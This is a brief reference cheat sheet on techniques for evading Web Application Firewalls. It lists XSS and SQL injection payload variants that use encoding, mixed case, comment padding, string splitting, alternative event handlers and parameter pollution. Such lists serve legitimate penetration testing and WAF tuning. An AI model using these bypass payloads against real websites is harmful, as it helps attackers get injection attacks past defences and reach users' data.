Techniques to evade WAF detection using encoding, case manipulation, alternative syntax, and exploiting parsing differences.
WAF Bypass refers to techniques that evade Web Application Firewall detection, allowing attack payloads to reach the vulnerable application. Bypasses exploit limitations in signature-based detection and parsing differences.
# URL encoding
<script> → %3Cscript%3E
# Double URL encoding
< → %253C
# Unicode encoding
< → \u003c
# HTML entities
<script> → <script>
<ScRiPt>
SeLeCt * FrOm users
# Tabs, newlines, comments
SELECT/**/password/**/FROM/**/users
SELECT%09password%09FROM%09users
<script%0d%0a>alert(1)</script>
# SQL
SEL' + 'ECT * FROM users
CONCAT('SEL','ECT')
# JavaScript
eval('al'+'ert(1)')
# XSS alternatives
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# SQL alternatives
1 UNION ALL SELECT
1 /*!UNION*/ SELECT
# Send same parameter twice
?id=1&id=2 UNION SELECT
# Different servers handle this differently